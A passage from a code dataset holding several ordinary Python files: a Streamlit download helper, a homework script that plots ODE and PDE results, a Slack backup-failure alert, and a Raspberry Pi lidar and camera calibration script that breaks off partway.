RGBToPILColor((r, g, b))\n self.update_form_color_ex(text, ncolor, r, g, b)\n\n def update_form_color_size(self):\n\n h_dlg = self.h_dlg_color\n prop = dlg_proc(h_dlg, DLG_CTL_PROP_GET, name='label_hls')\n need_size = prop['y']+prop['h']+FORM_GAP\n dlg_proc(h_dlg, DLG_PROP_SET, prop={'h': need_size})\n\n def update_form_color_ex(self, text, ncolor, r, g, b):\n\n h_dlg = self.h_dlg_color\n\n #let's get HSL like here https://www.rapidtables.com/convert/color/rgb-to-hsl.html\n h, l, s = RGBToHLS(r, g, b)\n h = float_to_degrees(h)\n l = float_to_percent(l)\n s = float_to_percent(s)\n\n dlg_proc(h_dlg, DLG_CTL_PROP_SET, name='panel_color', prop={\n 'color': ncolor,\n })\n\n dlg_proc(h_dlg, DLG_CTL_PROP_SET, name='label_text', prop={\n 'cap': text,\n })\n\n dlg_proc(h_dlg, DLG_CTL_PROP_SET, name='label_rgb', prop={\n 'cap': 'rgb(%d, %d, %d)' % (r, g, b),\n })\n\n dlg_proc(h_dlg, DLG_CTL_PROP_SET, name='label_hls', prop={\n 'cap': 'hsl(%s, %s, %s)' % (h, s, l),\n })\n\n\n def update_form_pic(self, ed, text):\n\n fn = self.get_pic_filename(ed, text)\n if not os.path.isfile(fn):\n return False\n\n image_proc(self.h_img, IMAGE_LOAD, fn)\n size_x, size_y = image_proc(self.h_img, IMAGE_GET_SIZE)\n if not size_x or not size_y:\n return False\n\n dlg_proc(self.h_dlg_pic, DLG_CTL_PROP_SET, name='label_text', prop={\n 'cap': '%d×%d' % (size_x, size_y),\n })\n\n label_h = dlg_proc(self.h_dlg_pic, DLG_CTL_PROP_GET, name='label_text')['h']\n\n #ratio_xy = size_x/size_y\n #if size_x bytes conversions necessary here\n href = {}\n for o, file_type in zip([csv_obj, xlsx_obj], [\"csv\", \"excel\"]):\n try:\n b64 = base64.b64encode(o.encode()).decode()\n\n except AttributeError as e:\n b64 = base64.b64encode(towrite.read()).decode()\n extension = \".csv\" if file_type == \"csv\" else \".xlsx\"\n href[\n file_type\n ] = f'Download as {file_type}!'\n with st.beta_expander(\"Download Data\"):\n st.markdown(href[\"csv\"], unsafe_allow_html=True)\n st.markdown(href[\"excel\"], unsafe_allow_html=True)\n", "repo_name": "A3Data/a3lab-streamlit", "sub_path": "a3lab/streamlit_obj/st_viz.py", "file_name": "st_viz.py", "file_ext": "py", "file_size_in_byte": 2215, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "seaborn.scatterplot", "line_number": 12, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 16, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 17, "usage_type": "call"}, {"api_name": "altair.Scale", "line_number": 17, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 18, "usage_type": "call"}, {"api_name": "altair.Scale", "line_number": 18, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 25, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 25, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "attribute"}, {"api_name": "io.BytesIO", "line_number": 43, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 51, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 54, "usage_type": "call"}, {"api_name": "streamlit.beta_expander", "line_number": 59, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "32272017283", "text": "import numpy as np\nimport matplotlib.pylab as plt\nimport math\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndatosODE1=np.genfromtxt(\"datosODE1.dat\",delimiter=\",\")\n\ntime1=datosODE1[:,0]\nposx=datosODE1[:,1]\nposy=datosODE1[:,2]\nvelx=datosODE1[:,3]\nvely=datosODE1[:,4]\n\n\nplt.figure()\nplt.plot(posx,posy,label=\"45\")\nplt.title('Trayectoria para 45 grados')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.ylim(0,3)\n#plt.show())\nplt.savefig(\"posxtiempo.pdf\")\n\ndatosODE2=np.genfromtxt(\"datosODE2.dat\",delimiter=\",\")\n\n#t1=datosODE2[:,0]\np1x=datosODE2[1:1800,1]\np1y=datosODE2[1:1800,2]\n#v1x=datosODE2[:,3]\n#v1y=datosODE2[:,4]\n\n#t2=datosODE2[:,5]\np2x=datosODE2[1801:3600,1]\np2y=datosODE2[1801:3600:,2]\n#v2x=datosODE2[:,8]\n#v2y=datosODE2[:,9]\n\n#t3=datosODE2[:,10]\np3x=datosODE2[3601:5400,1]\np3y=datosODE2[3601:5400,2]\n#v3x=datosODE2[:,13]\n#v3y=datosODE2[:,14]\n\n#t4=datosODE2[:,15]\np4x=datosODE2[5401:7200,1]\np4y=datosODE2[5401:7200,2]\n#v4x=datosODE2[:,18]\n#v4y=datosODE2[:,19]\n\n#t5=datosODE2[:,20]\np5x=datosODE2[7201:9000,1]\np5y=datosODE2[7201:9000,2]\n#v5x=datosODE2[:,23]\n#v5y=datosODE2[:,24]\n\n#t6=datosODE2[:,25]\np6x=datosODE2[9001:10800,1]\np6y=datosODE2[9001:10800,2]\n#v6x=datosODE2[:,28]\n#v6y=datosODE2[:,29]\n\n#t7=datosODE2[:,30]\np7x=datosODE2[10801:12600,1]\np7y=datosODE2[10801:12600,2]\n#v7x=datosODE2[:,33]\n#v7y=datosODE2[:,34]\n\nplt.figure()\nplt.plot(abs(p1x),(p1y),label=\"10\")\nplt.plot(abs(p2x),(p2y),label=\"20\")\nplt.plot(abs(p3x),(p3y),label=\"30\")\nplt.plot(abs(p4x),(p4y),label=\"40\")\nplt.plot(abs(posx),(posy),label=\"45\")\nplt.plot(abs(p5x),(p5y),label=\"50\")\nplt.plot(abs(p6x),(p6y),label=\"60\")\nplt.plot(abs(p7x),(p7y),label=\"70\")\nplt.xlim(0,5)\nplt.ylim(0,4)\nplt.title('Variacion en angulos')\nplt.xlabel(\"$x$\")\nplt.ylabel(\"$y$\")\nplt.legend(loc=\"best\")\n#plt.show()\n\nplt.savefig(\"posxtiempo2.pdf\")\n\n\n\n#---------------------------------------------------------------------------#---------------------------------------------------------------------------\n\n#PDE 3D\n#Guia para elaboracion de correctas grafics en 3D https://jakevdp.github.io/PythonDataScienceHandbook/04.12-three-dimensional-plotting.html\n\nxP=np.linspace(0,50,50)\nyP=np.linspace(0,50,50)\nx,y = np.meshgrid(xP,yP, sparse=True)\n\n\n#caso 1\ndatosC11=np.genfromtxt(\"datosPDEC11.dat\")\n#print(datosC11)\nfig=plt.figure()\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC11,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Condiciones iniciales Caso 1\")\nplt.savefig(\"c1g1inial.pdf\")\n\n\nfig=plt.figure()\ndatosC12=np.genfromtxt(\"datosPDEC12.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,abs(datosC12),antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio Caso 1\")\nplt.savefig(\"c1g2inter.pdf\")\n\n\nfig=plt.figure()\ndatosC13=np.genfromtxt(\"datosPDEC13.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,abs(datosC13),antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio 2 Caso 1\" )\nplt.legend(loc=\"best\")\nplt.savefig(\"c1g3inter.pdf\")\n\nfig=plt.figure()\ndatosC14=np.genfromtxt(\"datosPDEC14.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,abs(datosC14),antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado final Caso 1 \")\n\nplt.savefig(\"c1g4equi.pdf\")\nplt.show()\n'''\nplt.figure()\ndatosC15=np.genfromtxt(\"datosPDEC14.dat\")\nplt.plot()\nplt.title(\"Temperatura promedio Caso 3\")\nplt.legend(loc=\"best\")\n#plt.savefig(\"c1g5prom.pdf\")'''\n\n#----------------------------------------------------------------------#--------------------------------------------------------------------------------\n#caso 2\n\ndatosC21=np.genfromtxt(\"datosPDEC11.dat\")\nfig=plt.figure()\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC21,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Condiciones iniciales Caso 2\")\nplt.savefig(\"c2g1inial.pdf\")\n\ndatosC22=np.genfromtxt(\"datosPDEC22.dat\")\nfig=plt.figure()\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC22,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio-Caso 2\")\nplt.savefig(\"c2g2inte.pdf\")\n\n\ndatosC23=np.genfromtxt(\"datosPDEC23.dat\")\nfig=plt.figure()\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC23,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio 2- Caso 2\")\nplt.savefig(\"c3g3inter.pdf\")\n\n\ndatosC24=np.genfromtxt(\"datosPDEC24.dat\")\nfig=plt.figure()\nax =fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC24,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Configuracion de Equilibrio Caso 1\")\n\nplt.savefig(\"c2g4equi.pdf\")\n'''\nplt.figure()\ndatosC25=np.genfromtxt(\"datosPDEC25.dat\")\nplt.plot()\nax.set_zlabel('Temperatura')\nplt.title(\"Temperatura promedio Caso 3\")\n#plt.savefig(\"c2g5prom.pdf\")'''\n\n\n#------------------------------------------------------------------------------------------------------------------------------------------------------\n#caso 3\n\nfig=plt.figure()\ndatosC31=np.genfromtxt(\"datosPDEC11.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC31,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Condiciones iniciales Caso 2\")\nplt.savefig(\"c3g1inial.pdf\")\n\nfig=plt.figure()\ndatosC32=np.genfromtxt(\"datosPDEC32.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC32,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio Caso 3\")\nplt.savefig(\"c3g2inter.pdf\")\n\nfig=plt.figure()\ndatosC33=np.genfromtxt(\"datosPDEC33.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC33,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Estado Intermedio 2- Caso 3 \")\nplt.savefig(\"c3g3inter.pdf\")\n\nfig=plt.figure()\ndatosC34=np.genfromtxt(\"datosPDEC34.dat\")\nax = fig.gca(projection='3d')\nsup=ax.plot_surface(x,y,datosC34,antialiased=True,cmap=\"inferno\")\nfig.colorbar(sup, shrink=0.5, aspect=5)\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Temperatura')\nplt.title(\"Configuracion de Equilibrio Caso 3\")\nplt.savefig(\"c3g4equi.pdf\")\n\n'''\nplt.figure()\ndatosC35=np.genfromtxt(\"datosPDEC35.dat\")\nplt.plot()\nplt.title(\"Temperatura promedio Caso 3\")'''\n#plt.savefig(\"c3g5prom.pdf\")'''\n", "repo_name": "davilab1/AvilaDario_hw4", "sub_path": "Plots_hw4.py", "file_name": "Plots_hw4.py", "file_ext": "py", "file_size_in_byte": 7076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.genfromtxt", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylim", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlim", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylim", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pylab.legend", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 115, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 127, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pylab.legend", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 139, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pylab.show", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 171, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 182, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 194, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 231, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 242, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 250, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 250, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 251, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 251, "usage_type": "name"}, {"api_name": "matplotlib.pylab.figure", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 253, "usage_type": "name"}, {"api_name": "numpy.genfromtxt", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pylab.title", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pylab.savefig", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 262, "usage_type": "name"}]} +{"seq_id": "8016809319", "text": "#!/usr/bin/env python3\nimport requests, json, argparse\n\nSLACK_URL = \"https://hooks.slack.com/services/AAAAAA/BBBBBBB/CCCCCC\"\nCHANNEL = \"#alerts\"\nEMOJI = \":terminator:\"\nCOLOR = \"danger\"\n\ndef alert():\n parser = argparse.ArgumentParser(description='Send an alert when the Opstoolbox backup fails.')\n parser.add_argument('error_file', help=\"The log file\")\n args = parser.parse_args()\n error_file = args.error_file\n slack(error_file)\n\ndef slack(error_file):\n with open(error_file, \"r\") as err_file:\n MSG = err_file.read().strip()\n MESSAGE = {\n \"username\": \"Opstoolbox Backup\",\n \"channel\": CHANNEL,\n \"icon_emoji\": EMOJI,\n \"attachments\": [\n {\n \"fallback\": \"There was an error backing up Opstoolbox and an error sending this message. Check /opt/backup/TODAY/backup.log\",\n \"color\": \"danger\",\n \"title\": \"Opstoolbox Backup Issue\",\n \"text\": MSG\n },\n ],\n }\n requests.post(SLACK_URL, data=json.dumps(MESSAGE), headers={'Content-Type': 'application/json'})\n err_file.close()\n\nalert()", "repo_name": "imm-llc/scriptcity-public", "sub_path": "opsTBbackup/backup_alert.py", "file_name": "backup_alert.py", "file_ext": "py", "file_size_in_byte": 1122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "11669043658", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 11 18:53:37 2021\n\n@author: Haidi,Xingda,Sijia,Xi\n\"\"\"\nimport datetime\nimport inquirer\nimport serial\nimport time\nimport cv2\nimport numpy as np\nimport RPi.GPIO as GPIO\nimport pandas as pd\nimport random\nimport sys\nfrom numpy.linalg import svd\nfrom numpy.linalg import matrix_rank as rank\nfrom scipy.linalg import diagsvd\nfrom functions import *\n\n# set servos position\ndef MotorControl(pan,tilt): \n string_temp = 's'+str(pan)+str(tilt)+'\\n'\n string = bytes(string_temp,'utf-8')\n ser.write(bytes(string))\n #time.sleep(1) \n return None\n\n# Solve a Homogeneous Linear Equation System: Ax=0\ndef sol_svd(A):\n A = np.array(A)\n # find the eigenvalues and eigenvector of U(transpose).U\n e_vals, e_vecs = np.linalg.eig(np.dot(A.T, A)) \n # extract the eigenvector (column) associated with the minimum eigenvalue\n return e_vecs[:, np.argmin(e_vals)]\n\n# Matrix A\ndef Matrix(x,y,z,u,v,A):\n coe1 = [u, v, 1, 0, 0, 0, 0, 0, 0, -u*x, -v*x, -x]\n coe2 = [0, 0, 0, u, v, 1, 0, 0, 0, -u*y, -v*y, -y]\n coe3 = [0, 0, 0, 0, 0, 0, u, v, 1, -u*z, -v*z, -z]\n A.append(coe1)\n A.append(coe2)\n A.append(coe3)\n return A\n\n# get corresponding cordinate after getting M\ndef get_corr_point(M,u,v):\n M = M.reshape((4,3))\n x = (M[0][0]*u + M[0][1]*v + M[0][2])/(M[3][0]*u + M[3][1]*v + M[3][2])\n y = (M[1][0]*u + M[1][1]*v + M[1][2])/(M[3][0]*u + M[3][1]*v + M[3][2])\n z = (M[2][0]*u + M[2][1]*v + M[2][2])/(M[3][0]*u + M[3][1]*v + M[3][2])\n p3 = np.array([[x],[y],[z]])\n return p3\n\n# get polar coordinate system and cartesian coordinate system\ndef raw2polar_cart(rawM): \n T = np.zeros((int(rawM.size/5),3))\n points_size = int(T.size/3)\n points = np.zeros((points_size,3))\n for i in range(points_size): \n T[i,0] = mapfun(rawM[5*i]*256+rawM[5*i+1],0,4096,0,2*math.pi)\n T[i,1] = mapfun(rawM[5*i+2]*256+rawM[5*i+3],1024,3072,0,math.pi)\n T[i,2] = rawM[5*i+4] \n for i in range(points_size):\n points[i,0] = T[i,2]*math.sin(T[i,1])*math.cos(T[i,0])\n points[i,1] = T[i,2]*math.sin(T[i,1])*math.sin(T[i,0])\n points[i,2]=16-math.cos(T[i,1])*T[i,2]\n \n return T,points\n\n\nif __name__ == '__main__': \n cap = cv2.VideoCapture(0)\n \n diff = []\n A = []\n points_cloud = []\n # define the number of points we would like to take in calibration\n number_of_samples = 10\n x = 0\n y = 0\n z = 0\n cnt = 0\n mode = 0\n led = 14\n tll = 15\n random_index = 0\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(14,GPIO.OUT)\n GPIO.setup(15,GPIO.OUT)\n GPIO.output(led, GPIO.HIGH) \n #Hsv values for green color \n lower_green = np.array([40,40,40])\n upper_green = np.array([70,255,255])\n ser = serial.Serial('/dev/ttyUSB0',115200,timeout=1)\n ser.flush()\n #mode 0: hardware setup\n while mode == 0 :\n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n if line == \"Ready\":\n ServoReady = 1\n questions = [\n inquirer.List('next',\n message=\"What do you want to do next?\",\n choices=['Scanning', 'Calibration','Beetle_redirection'],),\n ]\n answers = inquirer.prompt(questions)\n if answers['next'] == \"Scanning\":\n string_scan_temp = 's'+\"StartScanning\"+'\\n'\n string_scan = bytes(string_scan_temp,'utf-8')\n ser.write(bytes(string_scan))\n mode = 1\n else:\n # Get the data from Lidar and process them to get the polar points and xyz points\n df = pd.read_csv(r'points_cloud.csv',header=None) #read the csv file (put 'r' before the path string to address any special characters in the path, such as '\\'). Don't forget to put the file name at the end of the path + \".csv\"\n rawM = df.to_numpy()\n T,points = raw2polar_cart(rawM)\n if answers['next'] == \"Calibration\":\n string_cal_temp = 's'+\"StartCalibration\"+'\\n'\n string_cal = bytes(string_cal_temp,'utf-8')\n ser.write(bytes(string_cal))\n mode = 2\n else:\n M_matrix = pd.read_csv(r'Calibration_matrix.csv',header=None)\n M = M_matrix.to_numpy()\n string_cal_temp = 's'+\"StartCalibration\"+'\\n'\n string_cal = bytes(string_cal_temp,'utf-8')\n ser.write(bytes(string_cal))\n cnt = 0\n mode = 4\n \n #mode 1: get points cloud and process them\n while mode == 1 : \n if ser.in_waiting > 0: \n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n if line == \"Scan done\" :\n 